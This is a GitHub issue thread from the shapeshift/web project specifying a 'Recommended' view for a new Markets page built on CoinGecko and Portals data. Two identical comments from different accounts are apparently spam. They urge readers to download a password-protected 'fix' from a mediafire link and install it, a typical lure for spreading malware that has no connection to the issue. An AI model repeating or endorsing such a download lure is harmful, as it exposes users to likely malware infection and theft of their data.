### ISSUE TITLE
Markets Page - Recommended View

### ISSUE THREAD

**Issue by 0xean** [shapeshift/web#7623]
[notion](https://www.notion.so/shapeshift/Markets-Page-Desktop-efad92c67eee47298d2e65a133e0ace8)
[figma](https://www.figma.com/design/cuSW3HCchxWeKC8CEvn029/Markets-Page-%26-Watchlist?node-id=814-2039&t=0BpTRBv2et0FfCHi-0)

Implement markets page to replace the assets page consuming existing APIs and filters from  from Coingecko and Portals.
Full spec in notion 

- This ticket covers the first view title "Recommended" in the figma - https://www.figma.com/design/cuSW3HCchxWeKC8CEvn029/Markets-Page-%26-Watchlist?node-id=814-2039&node-type=FRAME&t=t0uR3fvytDNR2HjD-0
- single select for the dropdowns with no syncronization across the rows
- add seperate route with feature flag so we don't lose the asset page currently

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 0xean** [comment]
Lets bring this up in the team call this week to discuss one more time re: a simpler more incremental approach
